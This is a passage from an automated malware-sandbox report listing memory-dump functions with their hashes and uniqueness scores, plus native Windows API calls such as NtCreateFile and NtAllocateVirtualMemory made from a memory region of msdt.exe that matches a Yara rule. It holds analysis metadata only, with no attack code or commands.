                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction ID: 38addcd6fa4b2bc3a851825ee0f82e286737b80f9f8b2d4877da7b65acc3cc9f
                                                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                    • Instruction Fuzzy Hash: A0D0C9329511869ADB51BB50D6187687BB2BB00328F6C2065984646966C33A4F5AF603
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F2AAB0, Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction ID: 99ed80194b4d551462ddcfc06d07b5b09d99458d83a51fa5ce2158b3d899a77c
                                                    • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                    • Instruction Fuzzy Hash: 49D0C935352D80CFD616CF0CC554B0533A4BB44B40FC50490E400CB721E62CDD44CA01
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F9A537, Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction ID: 5a7ca73eed916b1bba507c3416257b28bed090dd024f5da93511f2f2b7ad6fea
                                                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction Fuzzy Hash: 30C01232040248BBCB126E81CC01F057F2AE754760F004010B5040A5618536D971E644
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F1DB40, Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction ID: 2d2ecba93288bb3902f32599400fb1a77ddaf2e0aaf11c71a0eddf2962ecc654
                                                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction Fuzzy Hash: 27C08C30280A00AAEB225F20CD02B4076A0BB41B01F4500A07301DA0F1DB7CEC02FA00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F1AD30, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction ID: a7012d2ef81c2d306a717d4f0ce74a52428d264d8d773309d613b0d1e3430d75
                                                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction Fuzzy Hash: FDC08C32080288BBC7226A45CD01F017B29E790B60F000020B6040A6628936E860E588
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F276E2, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction ID: 7ed78a44c8b4547cdcf01c1089a4eedb2fd43bc776bfa81293987f24dc835fab
                                                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction Fuzzy Hash: A7C08CB0549BC85AEB2A7709CE21B203A50EB08728F48019CBA02094A2C36CAC02E208
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F436CC, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction ID: f1d72f9b47bb936ff54b0daf3c53a9cd00c150d01e5b0489829f98d09919c590
                                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction Fuzzy Hash: 1FC02B70150840BBE7152F30CD03F14B254F700B31F6403547220454F0D52CBC00F100
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F33A1C, Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction ID: 667e6541bb9d97bd27061b44f2848cc4133eb55d97de7d7aa9be53a7fe44e51d
                                                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction Fuzzy Hash: EDC04C32180648BBC7126E45DD02F15BB69E795B60F154021B6040A5618576FD61E598
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F37D50, Relevance: .0, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction ID: 99633da719d18cc4959a3d6c495a673c892be89fffeaf9733382d1febd210bf7
                                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction Fuzzy Hash: F5B09234301A408FCE26EF18C080B1533E4BB44B60F8400D0E800CBA20D329E8009900
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F42ACB, Relevance: .0, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction ID: 52eaa5a51ed99d266170a3dabd7f77a011bc5a8c94b10a6a56c6bf34f3435316
                                                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction Fuzzy Hash: 97B01233C10450CFCF02EF40DA10B197331FB40750F154490A00127931C22CAC11DB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F598A0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e25f2e81ec3d0edc8db9e46f1bcbfee3c2e035417aa43437146ba56ba58f9dca
                                                    • Instruction ID: 7c991122fbb429ddb0045e6ba7e6315998b67a3a55c1893e9b7567e50cdf8cd0
                                                    • Opcode Fuzzy Hash: e25f2e81ec3d0edc8db9e46f1bcbfee3c2e035417aa43437146ba56ba58f9dca
                                                    • Instruction Fuzzy Hash: C590026170100802D202615A44146061009D7D1385F91C022E1415555ECA658953F172
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F5B040, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 36ccfd01153b019b4c78d790deb89be71a44dc0d83a6137a7a7293e922384ff5
                                                    • Instruction ID: 958986f941412a3b606a93f13cf2524f8b24b7ed5cb67a3f2446ab696cd90b84
                                                    • Opcode Fuzzy Hash: 36ccfd01153b019b4c78d790deb89be71a44dc0d83a6137a7a7293e922384ff5
                                                    • Instruction Fuzzy Hash: 079002A1B01144438640B15A48044066015A7E1341391C131A0445560DCAA88855F2A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59820, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b042e2860e2f8f87d0edacc580bb1adf0f86c2a1afa4027f6420917f58af5e73
                                                    • Instruction ID: 6afb7f5af8fb0b7e12bbb3a947591c29abf6ef4c4ac3bb7350c7d33ef394fefe
                                                    • Opcode Fuzzy Hash: b042e2860e2f8f87d0edacc580bb1adf0f86c2a1afa4027f6420917f58af5e73
                                                    • Instruction Fuzzy Hash: C190027174100802D241715A44046061009A7D0381F91C022A0415554FCA958A56FAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F595F0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 06c06a0e30f6b74e2fbbd14df6347a5618a815ef480c8004ec1299e34d4a2b9f
                                                    • Instruction ID: 97b4d4227098a7a2a57406a2207a49413331b8c3362cc4450a8ddf373aed9ad1
                                                    • Opcode Fuzzy Hash: 06c06a0e30f6b74e2fbbd14df6347a5618a815ef480c8004ec1299e34d4a2b9f
                                                    • Instruction Fuzzy Hash: 1190027170100C02D204615A4804686100597D0341F51C021A6015655FDAA58891B171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F599D0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 776cac3f57ed99d9f44ced97c87a50c08d604b0a13e1fa302ded6dcce0e018c4
                                                    • Instruction ID: 75762e85b85d68af33cba1cf5f77b1edafdd7b16fefca7f9c3964ba81ec881d6
                                                    • Opcode Fuzzy Hash: 776cac3f57ed99d9f44ced97c87a50c08d604b0a13e1fa302ded6dcce0e018c4
                                                    • Instruction Fuzzy Hash: A69002A171100442D204615A4404706104597E1341F51C022A2145554DC9698C61B165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59560, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a68b80efbd865cf1b9df36b916af0db3c8a1e63ab11155afd436ad11a558cc5f
                                                    • Instruction ID: 157f4ae51d1c3a1f7fcc1a9db768938be55d100e99180187780bd429b9f142fc
                                                    • Opcode Fuzzy Hash: a68b80efbd865cf1b9df36b916af0db3c8a1e63ab11155afd436ad11a558cc5f
                                                    • Instruction Fuzzy Hash: B8900265721004024245A55A060450B1445A7D6391391C025F1407590DCA618865B361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59950, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8c5b263b4c6f7279902252b1da5b92e981491e9b3f4d80669d7b10d3a3bab71
                                                    • Instruction ID: b3dc1aeac9bf696be6f7c29ae8c2895fef093057165e6083b373a94bbb2c057a
                                                    • Opcode Fuzzy Hash: f8c5b263b4c6f7279902252b1da5b92e981491e9b3f4d80669d7b10d3a3bab71
                                                    • Instruction Fuzzy Hash: 0D9002A170140803D240655A4804607100597D0342F51C021A2055555FCE698C51B175
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F5AD30, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 563cad84e160e56cd52bf73f5bf9b9a1283f2850d2454aa211e312757a6aff9e
                                                    • Instruction ID: 59e66213e3a93ed93b77b9806678b167bbc586353a8b81ba9bb87a82de90cd61
                                                    • Opcode Fuzzy Hash: 563cad84e160e56cd52bf73f5bf9b9a1283f2850d2454aa211e312757a6aff9e
                                                    • Instruction Fuzzy Hash: F5900271F0500412D240715A48146465006A7E0781B55C021A0505554DCD948A55B3E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59520, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c75043013531e50fd2a02426779be72707290831c80d08ffa64e064f54df7e0f
                                                    • Instruction ID: b56d3cf2ee9574400fd83e4ba8f853969553b8f38c3dc40e6c6b66ef487a321a
                                                    • Opcode Fuzzy Hash: c75043013531e50fd2a02426779be72707290831c80d08ffa64e064f54df7e0f
                                                    • Instruction Fuzzy Hash: 869002E1701144928600A25A8404B0A550597E0341B51C026E1045560DC9658851F175
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F596D0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa7ff524e743ac987639c540015753e9013f4a9eacda9412f6eeb9c36c896579
                                                    • Instruction ID: 5994afd66a135911602b3a840ef2c5ee63760bf69128b9811fbced88e5e7bfe4
                                                    • Opcode Fuzzy Hash: fa7ff524e743ac987639c540015753e9013f4a9eacda9412f6eeb9c36c896579
                                                    • Instruction Fuzzy Hash: 4590027170100C42D200615A4404B46100597E0341F51C026A0115654ECA55C851B561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59A80, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bccfc074b3b64197159dfccc5c0fcb4a17aff420995ff18015fee691aa85e0ab
                                                    • Instruction ID: f43782f091c082e3d09da16d59e4d86b167642769c86227701557f1fd5541410
                                                    • Opcode Fuzzy Hash: bccfc074b3b64197159dfccc5c0fcb4a17aff420995ff18015fee691aa85e0ab
                                                    • Instruction Fuzzy Hash: 4D90026170144842D240625A4804B0F510597E1342F91C029A4147554DCD558855B761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59A10, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 734b9d94951d3a08a23b2d9aadca14a104e24609b26ff765ae94af46728405be
                                                    • Instruction ID: 22e91758d2b49730417ba2b58a5eb21cf5995fffb4712f8fcfd674e31d4d15fb
                                                    • Opcode Fuzzy Hash: 734b9d94951d3a08a23b2d9aadca14a104e24609b26ff765ae94af46728405be
                                                    • Instruction Fuzzy Hash: FE90027170140802D200615A4808747100597D0342F51C021A5155555FCAA5C891B571
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F5A3B0, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 53370409009091bbb0754e4b243e197419d24fb66c3333c035b8cfb5da905fee
                                                    • Instruction ID: ba693924c14fc6e2817a285f140e5e1775b2aa4439b42ff7454baf3bef223ce7
                                                    • Opcode Fuzzy Hash: 53370409009091bbb0754e4b243e197419d24fb66c3333c035b8cfb5da905fee
                                                    • Instruction Fuzzy Hash: 6D90027170144402D240715A844460B6005A7E0341F51C421E0416554DCA558856F261
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00F59B00, Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 35dbbf6202909fb7d3859402b2f4b1a2b421f0583276f7f03dc2f0d54107ce06
                                                    • Instruction ID: 6bd4c9cc810df605ea55ed33e5a922d44fd0e9f59289579ae833aa2ad8789531
                                                    • Opcode Fuzzy Hash: 35dbbf6202909fb7d3859402b2f4b1a2b421f0583276f7f03dc2f0d54107ce06
                                                    • Instruction Fuzzy Hash: B990026174100C02D240715A84147071006D7D0741F51C021A0015554ECA568965B6F1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00FAFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FAFDFA
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00FAFE2B
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00FAFE01
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                    • API String ID: 885266447-3903918235
                                                    • Opcode ID: ce7f2d178728b157a308f42a31498d4815cf2aff6b671630def45e6b4210cff7
                                                    • Instruction ID: 18ebd43937fdbafa38dca53c76c29bd319c1f2a3bd9066053c6d97313bea89f0
                                                    • Opcode Fuzzy Hash: ce7f2d178728b157a308f42a31498d4815cf2aff6b671630def45e6b4210cff7
                                                    • Instruction Fuzzy Hash: 5DF0FC725006017FD6201A45DC46F37BF5ADB45730F244315F618551E1EA62F820B6F5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Analysis Process: msdt.exe PID: 6440 Parent PID: 2256 msdt.exeCOMMON

                                                    Executed Functions

                                                    Function 027785EB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,02773BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02773BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0277863D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    • Opcode ID: ff5d448eff0e32eb58a503c0a23eb2a23968ac6f405612a2d4973c508889f361
                                                    • Instruction ID: f20714fec809ed608afd91c3b8157f966185bb23a91cecfa826a75de8f973551
                                                    • Opcode Fuzzy Hash: ff5d448eff0e32eb58a503c0a23eb2a23968ac6f405612a2d4973c508889f361
                                                    • Instruction Fuzzy Hash: 9001B2B2245108AFCB08CF98DC95EEB77A9AF8C354F158248FE1DD7241D630E851CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027785F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,02773BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02773BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0277863D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction ID: 18bc88876275f68a0930fb4ebadc9cd09d84b58ab476c95e1c7d2a721cfaa6f8
                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction Fuzzy Hash: A5F0B2B2201208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97241D630E811CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277871A, Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtClose.NTDLL(02773D60,?,?,02773D60,00000000,FFFFFFFF), ref: 02778745
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: e38eaebc72375dbc8d4f18041b72683b0b7b1fa2d1be8f78124c1b96cf0a84cb
                                                    • Instruction ID: efef35f260e1a0f73e97680932b4e0d9b3c724a22f7729088503eeb21878fe18
                                                    • Opcode Fuzzy Hash: e38eaebc72375dbc8d4f18041b72683b0b7b1fa2d1be8f78124c1b96cf0a84cb
                                                    • Instruction Fuzzy Hash: C1015A76200208AFDB14DF98CC88EEB77A9EF88310F118558BE0DAB241C630E910CBE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027786A0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtReadFile.NTDLL(02773D82,5E972F65,FFFFFFFF,02773A41,?,?,02773D82,?,02773A41,FFFFFFFF,5E972F65,02773D82,?,00000000), ref: 027786E5
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                    • Instruction ID: a2356ee9d5dbda5f91cdeaa0c3d0bced121251f926ca3374d142aad579de4eae
                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                    • Instruction Fuzzy Hash: 6FF0A4B2200208ABCB14DF89DC84EEB77ADAF8C754F158248BE1D97241D630E811CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027787CA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02762D11,00002000,00003000,00000004), ref: 02778809
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: 764bd77962477d57291ca3809ad34b303e7b23d738b60c58afc3547f8011096f
                                                    • Instruction ID: 6aa0d5aa1fead8a116b565d2c835ff106da043ddf0c602d8e95f5255fa516296
                                                    • Opcode Fuzzy Hash: 764bd77962477d57291ca3809ad34b303e7b23d738b60c58afc3547f8011096f
                                                    • Instruction Fuzzy Hash: 55F015B6211158AFDB18DF88CC84EAB77ADFF88354F118589FE5A97241C630E811CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027787D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02762D11,00002000,00003000,00000004), ref: 02778809
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                    • Instruction ID: bd2ce0dc3dda48579175d540d375a8795c883d0a2c9f4bbfd900e842b2c36f44
                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                    • Instruction Fuzzy Hash: 78F015B2200208ABCB14DF89CC84EAB77ADAF88750F118148BE0897241C630F810CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02778720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtClose.NTDLL(02773D60,?,?,02773D60,00000000,FFFFFFFF), ref: 02778745
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Offset: 02760000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                    • Instruction ID: c6416eb4909dbdb9f9c45c0f1aa2f9642a8046f9385b4ec160086d3311cde6d0
                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                    • Instruction Fuzzy Hash: 48D01275201214ABD710EB98CC89E97776DEF44750F154455BA185B242D530F51086E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B09860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.521095893.0000000004AA0000.00000040.00000001.sdmp, Offset: 04AA0000, based on PE: true
